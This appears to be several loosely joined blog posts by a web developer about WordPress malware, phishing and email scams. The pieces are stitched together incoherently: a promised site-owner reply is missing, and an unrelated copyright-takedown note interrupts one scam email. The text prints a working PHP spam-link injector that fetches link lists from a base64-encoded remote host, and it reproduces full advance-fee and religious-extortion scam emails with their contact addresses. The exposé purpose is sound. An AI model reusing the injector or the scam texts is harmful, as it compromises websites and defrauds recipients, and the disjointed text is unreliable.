I found several sites explaining how to manually remove this malware by editing the windows registry but I intend to make the instructions a little more clear so you can do this with a little more confidence.

And keep in mind, if you’re not dealing with XP, my instructions might not work exactly.  But you can probably apply my clarification to the popular instructions to whatever iteration of those instructions you need to work with.

Here are the popular instructions (in this case from removeit.info), but please keep reading before trying to follow them.

Remove AntiMalware GO files and folders:
%Temp%\[random]\[random].exe

Remove AntiMalware GO registry entries:
HKEY_CURRENT_USER\Software\[random]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “[random].exe”
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter “Enabled” = “0?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings “ProxyOverride” = “”

Clarifications and Precautions:

1. You can screw things up by making a mistake editing your registry, but you can minimize the risk by making a backup of the registry first.  Google it.  Sorry, I can’t make a tutorial on this, partly because I’m writing this on a Mac.
2. There are no files that actually say “[random]“.  What they say is something like “vhrdtmn1d” …In other words, in each of these steps, you’re looking for a registry entry or file that has a random string of characters.

2nd UPDATE: The folks at Moona helped me to determine that the email header info shows:

Return-Path: <mae.hannahdj@moonaconsulting.com>

Received: from consultingmag.com (devel-si.lightedge.com [216.81.167.125])

This essentially proves that moonaconsulting.com is not the true sender of the email.

UDPATE: a few weeks after posting this, I got an email from the owner of the site this email claims to be from.  He says they had nothing to do with these phishing scam emails.  The message I got from him is at the bottom of this post.

Subject: Contract terms have been breached.

8 April, 2010

Hello,

It has come to our attention that you are republishing original content from our website on your website.
Your unauthorized use of original material from our website is in violation of copyrights owned by us.
If you do not immediately remove the copyrighted material from your website, and notify us in writing
that you have done so, we will have no choice but to pursue legal action against you.
We require the copyrighted material to be removed and written notice given that such has been removed,
by no later than May 1, 2010. Attached is a list of the copyrighted material that you are infriging on.
It contains links to the copyrighted material that you are using.

Sincerely,

CASE ID: 7714338

[Attached was a Word doc which says:]

(double click to view)

embedded you will find the law suit documents that

we wish to present in court.

Thank you

[It seems this is a phishing scam.  They want me to launch an embedded app or something.]

[now here's the response I got to this post from the site's owner.]

Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either

• Have screwy server settings that tempt developers to take risks with file permissions, or
• Have vulnerabilities that allow malware to sneak from one hosting account to another

As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names.  But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do.  You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.

I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere.  But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.

So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a WordPress.org page HERE, because according to the WordPress.org page, Network Solutions has since edited the announcement)”

“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”

In fact, it was not a WordPress problem at all.  So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:

“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”

Thank you Matt!  We the people that use and love WordPress need to stand up for ourselves and demand what we deserve.  We are not a fringe community anymore.  WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!

The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,

which is http://www.zml.com/

I don’t know if zml.com knows this is happening.  I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it.  I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.

The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.

The following is a list of the sites being linked thru, which I assume are all victims of this malware.  If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.

• http://blog.segd.org
• http://www.investorsunited.com
• http://www.oca-gla.org
• http://www.thunderstruck.org
• http://subway.com
• http://verdadeabsoluta.net
• http://yourrnc.com
• http://wordpressthemesbox.com
• http://mp3db.org
• http://webconsultingdc.com
• http://turtlesurvival.org
• http://turtleconservationfund.org
• http://truenorthbrass.com
• http://tarabooks.com
• http://kolenalaila.com
• http://techbostonacademy.org
• http://pie-flex.com
• http://www.philebrity.tv
• http://www.landmarkwine.com
• http://artsinbushwick.org
• http://brettmartin.org
• http://bsf.org
• http://www.popandpolitics.com
• http://womanhonorthyself.com
• http://www.brainstorm9.com
• http://webdev.entheosweb.com
• http://www.topicus-healthcare.com
• http://www.vfilings.com
• http://constantinessword.com
• http://www.dopiska.com
• http://writingcenters.org
• http://www.radisson.com
• http://notjustaprettyface.org
• http://www.arizonacriminaldefenseblog.com
• http://www.sembrarpaz.com
• http://www.apostilla.com
• http://www.geektechs.net
• http://johnquiggin.com
• http://blog.pdma.org
• http://bluesheaven.com

Message to ZML:

Hello,

I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.

You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.

It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.

Thanks,

Andrew A. Peterson

Some samples of weird code that the bot inserted:

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>

<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

 

<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k=>$v) $txt_out.=’<a href=”‘.$v.’”>’.$k.’</a>’; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”

Who knew that was the thing to do?  I didn’t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.

Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.

WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually. 

Basically you:

1. download your database thru PHPMyAdmin as per WordPress.org’s Documentation, 
2. do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_” 
3. make a new database and import your “somethingelse_” version to the new database.
4. Change your wp-config.php file to point at the new database 
5. Change your wp-config.php file’s “table prefix” line from “$table_prefix  = ‘wp_’ ” to “$table_prefix  = ‘somethingelse_’“

These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.

Appears in place of the Dashboard in WordPress

The page then goes on with some left wing political stuff, and claims to be affiliated with a site called ateskes.org and is signed “King Defacer”

I’d rather see hacking going on for the sake of activism than for worthless spam, but this thing sucks. The blog on which I encountered this was not particularly political and so I suspect that the makers of this attack aren’t picking and choosing who they attack, which makes it evil crap.   

Bottom line, keep WordPress up to date, stay on top of your comment moderation, and use WordPress’ Cookie-Encryption “Security Keys” feature in your wp-config file.

If this has happened to you, I recommend deleting your spam/comments in moderation (if there’s too many, check here), upgrading WordPress, then changing your Dashboard passwords. Of course, also delete the file called index.html in your wordpress directory’s wp-admin folder.

Full text of “Hacked By Guard_FB” Dashboard page is as follows:

 

Hacked By GUARD_FB

 

Ateskes.Org

We Accuse:

G.W. Bush, T. Blair, and E. Olmert, the chief executives of the imperialist, colonialist, belligerent policies and actions of the US-British-Israeli coalition, of perpetrating the composite crimes of war of annihilation, occupation, and the premeditated mass murder of children and civilians in Palestine and Lebanon, following their atrocities in Afghanistan and Iraq and foreboding the same in Syria and Iran, sinking into utter barbarity in transgression of all universal norms of human morality.

The Following Are Also Responsible:

All government employees and agents, advisors, civil and military functionaries who partake in collective and individual responsibility in these states; the legislative and judicial branches that have not curbed the criminal activities of their governments as they violate basic human rights, most significantly the right to live, and as they trample international legal norms and commit crimes against humanity; universities, media, intellectuals, workers and citizens who do not restrain and sanction their governments through domestic democratic channels; UNITED NATIONS and other national and international bodies that actively or passively support, aid and abet this illegality, crude force, and aggression –all bear responsibility for the catastrophe that is taking place.

We Demand:

An immediate cessation of this horror, the due trial, in international tribunals, as well as in the courts of conscience and history, of, above all, Bush, Blair, and Olmert as perpetrators of crimes against humanity, of their respective government agents and supporters, of the chief executives and state personnel in all countries that have been accomplices to these crimes against humanity, and their removal from office by the lawful and democratic initiatives of their respective citizenry.

And We Declare:

We stand at a critical juncture in human history. These aggressive, colonialist, exploitative, and militarist practices are negating the achievements of humanity, destroying the basic pillars of international law, and thus, threatening the present and the future of this planet. We refuse to submit to this brutal force and be accomplices to its crimes. We refuse to give in to the (il)logic of blood-fed economies and lethal war machines. We declare that we will continue to struggle for a different world.

 

---

www.Ateskes.Org

King Defacer

 

Braafontein 

Johannesburg

South Africa 
Tel/Fax+0027 86 529 0021 

  
Dear Sir, 

I am MR.FRED SIBAYA from Zimbabwe the first Son of MR JOHN SIBAYA, who was murdered in the land dispute in Zimbabwe by the agents of the ruling government of President ROBERT MUGABE, you must have heard his alleged support and sympathy for the opposition MDC PARTY led by the minority white farmers.  My Father was among the few black Zimbabwean rich farmers murdered in cold blood by the war veterans backed by the government.   

Before the death of my Father, he deposited the sum of US$12M (Twelve Million United State Dollars) With one of the security company in Southern Africa, as if he knew the looming danger in ZIMBABWE. The money was deposited as a gem and precious stones to avoid much attraction  from the security firm. The money was earmarked for the purchase of new machinery and chemicals for the farms and the establishment of new farms in Lesotho and Swaziland before the regretted incident.  This Land problem arose when President Robert Mugabe introduced a new land act. Which wholly affects the white rich farmers and some few blacks vehemently condemned the “Modus operandi” adopted by the government.  This resulted to rampart killing and Mob actions.   

My mother and I are staying in South Africa now as Asylum seekers, which have not been beneficial to us; I have decided to transfer this money to a foreign country where we can invest it. I am faced with the dilemma of investing this amount of money in South Africa for fear of encountering the same experience in future since both countries have the same political policy and also law does not permit us to investment hence we’re refugees.  I must let you know that this business is 100% risk free. I and my family have agreed to give you 20% of the total US12M, 5% will be mapped out for all expenses that maybe incurred during the transfer 5% for any charity organization and 70% will be for me and my family’s investment in your country. 

Therefore if you are willing and interested to render the needed assistance, endeavour to reply through   HYPERLINK “mailto:fredsibaya0@gmail.com” \t “_blank” fredsibaya0@gmail.com for more brief clarifications. I also need your private mobile, telephone and fax numbers for easy communication. Remember; this is highly confidential and the success of this business depends on how secret it is kept. Expecting your reply soonest. 

 
Best regards, 

 
MR.FRED SIBAYA (FOR THE FAMILY)

From: david@teceng.net

I am Prophet David Johnson, I went for a prayer mission in HAITI and the Lord revealed so many things about you to me.

I see things and I reveal to people, something terrible which I have seen will happen to you, I just have to tell you, you will lose two important people you love very much, and evil will visit you personally, troubles and problems will leave with you, the things you never never believe that can happen to you, will happen. It has been dated when it will start very soon, sooner than you think.

The Lord reveal everything to me, and your email address appeared to me, after reading this message, if you believe me keep this message for your self alone do not share it with anybody, but if you don’t believe me delete this message and talk to your family, friends and relatives, tell them about the message so when things start happening to you, they will be informed, everything that will happen to you is spiritual, nobody will understand, when you even tell people what is happening to you they will never believe and understand because it is spiritual.

I have warned you now, we can prevent all this, but only if you believe God, but if you don’t believe God, wait and see what will happen.

Lord has done so much for you, that you have failed to recognize and you have been cheating God, at this time your email address was revealed to me three times, that’s why I am contacting you, do not think this is a joke or just an email because I know what will be going on in your mind, you are free to believe and disbelief this message, but when evil starts happening there is no going back, I warn you it has been destined and dated, it will start sooner than you think.

As you are reading this message I still see doubt in you, but I will stop here. If you want to prevent all this evil that will hit you soon, I will know and I will tell you what to do.

God reveal to me that you have a lot of doubt in your mind that you will doubt this message.

The reason for writing this message, is because of the strong challenge which you must have to follow to prevent all this evil which will surround you sooner, you will not see them and you can never see them, because it is spiritual, when it starts it cannot stop, it will be as if God has giving you to Satan.

Look this is not a joke, this is what I have seeing and the only prevention is for you not to doubt and do what I will tell you to do, for your soul to be covered in God’s harms. We have to take you back from the Satan if you are ready to follow God’s instructions I will tell you what to do.

I can still see even as I’m writing this message that there is plenty of doubt inside your heart and mind, but you can over power your doubt, only if the evil leaving in your heart will allow you, it will be very difficult for you to do what God’s want you to do, but you can do it only if you put doubt aside.

God told me that we will win you back, but it will be difficult because your heart has been eating by doubt, my only advice to you to remove doubt and keep this message to you self, if you don’t take my advice wait and see. This is the only way out for you to avoid this evil, you have to sow a seed in the house of the Lord, there is a church we are building in Africa, and we want you to sow a seed in contributing on that church where your name will be writing as one of the people that contributed to stand the house of the Lord where people will enter everyday and pray for you who contributed to put up the structure.

I was notified by "L Matlow" or "E.Morgan, Copyright Compliance" or, more likely, Linda Matlow, the photographer (pretending to be a lawyer), with a copyright infringement notice for this image, so I erased it. The link on the broken image still works, so feel free to look at the google results to get an idea of what might have been here.

The only way out of this predicament is you must have to contribute for the building of the church, your name must be writing in the church as one of the sponsors that is where your name will be written in the book of life, the book of joy and the book of happiness things will now turn around, when the church is completed everyday service your name will be announced for the church congregation to pray for you.

So you have to sow that seed that is the only message that will take you out of this evil, you name must be writing in that church before it is completed. There’s no way back we will beg you to do this because this is the only way for the evil to turn around, I’m a prophet I don’t talk too much. But if you fail to do what you have been told now, when the predicament start even if you give all you have to the church at that time it will not work, I am warning and begging don’t ignore this message.

The church will go on 40 days fasting for you starting from the day you sow a seed for the building of the church. Contact Pastor Emmanuel Anderson, tell Pastor Anderson that you want to contribute for the building of the new church, do not tell him about what I told you, just tell him you want to contribute then ask him how you can sow a seed, do this as quick as possible, nothing is too small and nothing is too big for the Lord do not cheat God again, do this I have told you.

Give what you have never giving before, give what you feel your heart tells you, remember nothing  is too small and nothing is too big for the Lord, contact Pastor Emmanuel Anderson on this e-mail (pastoranderson@faithconvenantministry.co.cc) and tell him you want to sow a seed, after you have done that, then wait and see how blessing will rain upon your life each day, how you will swim in the rivers of success and joy.

I have given you the information and message which I was asked to give you, so now it is now left for you to believe it and do what you where told or forget it. I will never write you again or reply you, I have told you what I have to tell you, after reading this message you only have two things to do, either you follow the message or not.

I wish you the best in life.

Have a blessed day.

Regards,

Prophet David Johnson.

Assuming you are an ethical participant of The Cloud, pretty soon you should get an email from WordPress.com explaining the nature of the take-down.

[Anyway, my blog is back, obviously.  I guess I need to start backing up my blog? Jeeez.  What a hassle.]

[begin story]

I regularly blog about scams/spam on the Web.  It’s a way for me be discovered by, and to provide guidance to, people who happen to be googling around about some questionable content they find or are emailed.

One example of this is this search result for “paypal-cgi.com,” a site that mimics PayPal in order to trick people into handing over their paypal login info.  I come up number one for the search, and the title of the result makes it clear that you shouln’t trust PayPal-CGI.com… If you click thru to my post, I explain why these things exist and how to detect this kind of crap.

You see, I’m actually doing something good here.  And it’s good for me too.

Anyway, recently I encountered some scam crap on craigslist and blogged about it. And since my blog post contained a link to the spam/scam site I was exposing, WordPress.com’s evil-detectors went ape shit and my blog got automatically removed by wordpress.com.  

I was in the middle editing a post and suddenly my category selection buttons stopped working.  And there was a thing saying somethin like “you do not have permission to edit this..” or something like that.  When I refreshed the page, I got “The authors have deleted this blog. The content is no longer available”

…and my blog had been completely removed leaving only this scary screen saying: “This blog has been archived or suspended for a violation of our Terms of Service.”

Ironic. I got banned for merely exposing something malicious.

Current Spam-Filter technology isn’t context-aware. This is a slippery slope: Using words or links alone, without regard to context, to define what is untrustworthy content.

See the post in question for yourself HERE: 

Fortunately, about an hour later, I got a message from WordPress.com: 

from: Anthony – WordPress.com:

Hi,

Your blog was automatically flagged, as links to overnightcashexplosion.com were detected (and these are certainly not permitted). The blog is back – please remove all such links.

Best,

Anthony

Automattic | WordPress.com

I responded with:

if it’s a url in text, is that different in the eyes of your spam defenses from an actual link?  I’d like to leave the url if possible so I can still come up in searches for that url. 

WHat’s your take on that?

Thanks for communicating with me.

-A

Anthony from WordPress replied:

Hi,
Sure, you can leave it – I understand the context.

Best,
Anthony
Automattic | WordPress.com

So, there is a layer of discretion here?  That’s good I guess.